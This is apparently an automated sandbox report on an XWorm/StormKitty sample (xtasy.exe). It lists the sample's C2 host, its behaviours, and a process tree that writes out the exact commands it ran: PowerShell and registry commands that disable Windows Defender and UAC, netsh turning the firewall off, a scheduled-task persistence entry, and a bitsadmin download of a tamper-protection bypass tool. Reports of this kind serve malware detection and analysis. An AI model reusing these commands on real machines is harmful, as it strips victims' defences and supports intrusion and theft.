Analysis

  • max time kernel
    597s
  • max time network
    655s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241211-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    26-12-2024 19:13

General

Malware Config

Extracted

Family

xworm

C2

mbaper-28496.portmap.host:28833

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    .exe

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 2 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 1 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in System32 directory 5 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 14 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 46 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 16 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 59 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/UtAbQk
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb9af546f8,0x7ffb9af54708,0x7ffb9af54718
      2⤵
        PID:732
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
        2⤵
          PID:2784
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:5032
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
          2⤵
            PID:3464
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1
            2⤵
              PID:1880
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
              2⤵
                PID:2012
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4772 /prefetch:1
                2⤵
                  PID:2776
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
                  2⤵
                    PID:3252
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                    2⤵
                    • Drops file in Program Files directory
                    PID:4156
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff76bce5460,0x7ff76bce5470,0x7ff76bce5480
                      3⤵
                        PID:4572
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5112
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
                      2⤵
                        PID:1412
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5968 /prefetch:8
                        2⤵
                          PID:3272
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
                          2⤵
                            PID:4232
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1004
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,1862745470298060275,17818255499452122597,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6560 /prefetch:8
                            2⤵
                              PID:4976
                            • C:\Users\Admin\Downloads\xtasy.exe
                              "C:\Users\Admin\Downloads\xtasy.exe"
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • UAC bypass
                              • Disables RegEdit via registry modification
                              • Checks computer location settings
                              • Drops startup file
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              • Checks processor information in registry
                              • Enumerates system info in registry
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • System policy modification
                              PID:2616
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\xtasy.exe'
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5260
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'xtasy.exe'
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5528
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ .exe'
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5756
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess ' .exe'
                                3⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5964
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn " " /tr "C:\ProgramData\ .exe"
                                3⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:5940
                              • C:\Windows\system32\sc.exe
                                "C:\Windows\system32\sc.exe" qc windefend
                                3⤵
                                • Launches sc.exe
                                PID:4376
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                3⤵
                                  PID:3040
                                  • C:\Windows\system32\SecurityHealthSystray.exe
                                    SecurityHealthSystray
                                    4⤵
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:5192
                                • C:\Windows\system32\whoami.exe
                                  "C:\Windows\system32\whoami.exe" /groups
                                  3⤵
                                    PID:2772
                                  • C:\Windows\system32\net1.exe
                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                    3⤵
                                      PID:3536
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ymwebk.bat" "
                                      3⤵
                                        PID:4276
                                        • C:\Windows\system32\cacls.exe
                                          "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                                          4⤵
                                            PID:3116
                                          • C:\Windows\system32\wscript.exe
                                            wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
                                            4⤵
                                              PID:3032
                                            • C:\Windows\system32\bitsadmin.exe
                                              bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
                                              4⤵
                                              • Download via BitsAdmin
                                              PID:5552
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:4320
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:5840
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
                                              4⤵
                                              • UAC bypass
                                              PID:2900
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:4308
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -command "Set-MpPreference -PUAProtection disable"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:420
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:4520
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:5564
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jadove.bat" "
                                            3⤵
                                              PID:5508
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                4⤵
                                                • Modifies Windows Defender Real-time Protection settings
                                                PID:3780
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                4⤵
                                                  PID:1952
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                  4⤵
                                                    PID:4812
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
                                                    4⤵
                                                      PID:4008
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                      4⤵
                                                        PID:2152
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                        4⤵
                                                        • Modifies Windows Defender Real-time Protection settings
                                                        PID:1320
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\dvpwid.ps1"
                                                      3⤵
                                                      • Modifies security service
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Modifies Security services
                                                      PID:1528
                                                      • C:\Windows\system32\whoami.exe
                                                        "C:\Windows\system32\whoami.exe"
                                                        4⤵
                                                          PID:5260
                                                        • C:\Windows\system32\whoami.exe
                                                          "C:\Windows\system32\whoami.exe"
                                                          4⤵
                                                            PID:2628
                                                        • C:\Windows\System32\netsh.exe
                                                          "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
                                                          3⤵
                                                          • Modifies Windows Firewall
                                                          • Event Triggered Execution: Netsh Helper DLL
                                                          PID:4308
                                                        • C:\Windows\System32\sc.exe
                                                          "C:\Windows\System32\sc.exe" stop wuauserv
                                                          3⤵
                                                          • Launches sc.exe
                                                          PID:4512
                                                        • C:\Windows\System32\sc.exe
                                                          "C:\Windows\System32\sc.exe" config wuauserv start=disabled
                                                          3⤵
                                                          • Launches sc.exe
                                                          PID:5168
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eaxdse.bat" "
                                                          3⤵
                                                            PID:6408
                                                            • C:\Windows\system32\reg.exe
                                                              reg add hklm\software\policies\microsoft\windows\photosolder\photostore /v disablecamlight /t reg_dword /d 1
                                                              4⤵
                                                              • Modifies registry key
                                                              PID:6468
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:3056
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:348
                                                          • C:\Windows\servicing\TrustedInstaller.exe
                                                            C:\Windows\servicing\TrustedInstaller.exe
                                                            1⤵
                                                              PID:420
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                2⤵
                                                                • Modifies Windows Defender Real-time Protection settings
                                                                • Modifies Windows Defender notification settings
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:864
                                                                • C:\Windows\system32\sc.exe
                                                                  "C:\Windows\system32\sc.exe" qc windefend
                                                                  3⤵
                                                                  • Launches sc.exe
                                                                  PID:5648
                                                                • C:\Windows\system32\cmd.exe
                                                                  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                  3⤵
                                                                    PID:5300
                                                                    • C:\Windows\system32\SecurityHealthSystray.exe
                                                                      SecurityHealthSystray
                                                                      4⤵
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      • Suspicious use of SendNotifyMessage
                                                                      PID:5364
                                                                  • C:\Windows\system32\whoami.exe
                                                                    "C:\Windows\system32\whoami.exe" /groups
                                                                    3⤵
                                                                      PID:5412
                                                                    • C:\Windows\system32\net1.exe
                                                                      "C:\Windows\system32\net1.exe" stop windefend
                                                                      3⤵
                                                                        PID:5632
                                                                      • C:\Windows\system32\sc.exe
                                                                        "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:5628
                                                                      • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                        "C:\Program Files\Windows Defender\MpCmdRun.exe" -DisableService
                                                                        3⤵
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:2552
                                                                  • C:\Windows\system32\taskmgr.exe
                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                    1⤵
                                                                    • Checks SCSI registry key(s)
                                                                    • Modifies registry class
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:3364
                                                                  • C:\Windows\System32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                    1⤵
                                                                      PID:3728
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SDRSVC
                                                                      1⤵
                                                                        PID:6016
                                                                      • C:\Windows\System32\cleanmgr.exe
                                                                        "C:\Windows\System32\cleanmgr.exe" /D C
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Windows directory
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        PID:2012
                                                                        • C:\Users\Admin\AppData\Local\Temp\FF9852EF-B07B-46A0-89BD-15152433BB82\dismhost.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\FF9852EF-B07B-46A0-89BD-15152433BB82\dismhost.exe {3AFEA4D4-D9E8-409E-AD4B-E893B8C97A60}
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Drops file in Windows directory
                                                                          PID:3040
                                                                      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                        1⤵
                                                                        • Drops file in Windows directory
                                                                        PID:5404
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                        1⤵
                                                                          PID:5484
                                                                          • C:\Windows\system32\Taskmgr.exe
                                                                            "C:\Windows\system32\Taskmgr.exe"
                                                                            2⤵
                                                                            • Checks SCSI registry key(s)
                                                                            • Checks processor information in registry
                                                                            PID:3340
                                                                          • C:\Windows\system32\Taskmgr.exe
                                                                            "C:\Windows\system32\Taskmgr.exe"
                                                                            2⤵
                                                                              PID:2276
                                                                          • C:\Windows\regedit.exe
                                                                            "C:\Windows\regedit.exe"
                                                                            1⤵
                                                                            • Runs regedit.exe
                                                                            PID:4680
                                                                          • C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe
                                                                            "C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe" -ServerName:SecHealthUI.AppXep4x2tbtjws1v9qqs0rmb3hxykvkpqtn.mca
                                                                            1⤵
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:5016
                                                                          • C:\Windows\System32\SecurityHealthHost.exe
                                                                            C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                            1⤵
                                                                              PID:2540
                                                                            • C:\Windows\System32\SecurityHealthHost.exe
                                                                              C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                              1⤵
                                                                                PID:916
                                                                              • C:\Windows\System32\SecurityHealthHost.exe
                                                                                C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                1⤵
                                                                                  PID:5552
                                                                                • C:\Windows\System32\SecurityHealthHost.exe
                                                                                  C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                  1⤵
                                                                                    PID:5744
                                                                                  • C:\Windows\System32\SecurityHealthHost.exe
                                                                                    C:\Windows\System32\SecurityHealthHost.exe {3522D7AF-4617-4237-AAD8-5860231FC9BA} -Embedding
                                                                                    1⤵
                                                                                      PID:2340
                                                                                    • C:\Windows\System32\SecurityHealthHost.exe
                                                                                      C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                      1⤵
                                                                                        PID:5976
                                                                                      • C:\Windows\System32\SecurityHealthHost.exe
                                                                                        C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                        1⤵
                                                                                          PID:3868
                                                                                        • C:\Windows\System32\SecurityHealthHost.exe
                                                                                          C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                          1⤵
                                                                                            PID:2232
                                                                                          • C:\Windows\System32\SecurityHealthHost.exe
                                                                                            C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                            1⤵
                                                                                              PID:5284
                                                                                            • C:\Windows\System32\SecurityHealthHost.exe
                                                                                              C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                              1⤵
                                                                                                PID:4704
                                                                                              • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                1⤵
                                                                                                  PID:6020
                                                                                                • C:\Windows\System32\SecurityHealthHost.exe
                                                                                                  C:\Windows\System32\SecurityHealthHost.exe {E041C90B-68BA-42C9-991E-477B73A75C90} -Embedding
                                                                                                  1⤵
                                                                                                    PID:5528
                                                                                                  • C:\Windows\System32\SecurityHealthHost.exe
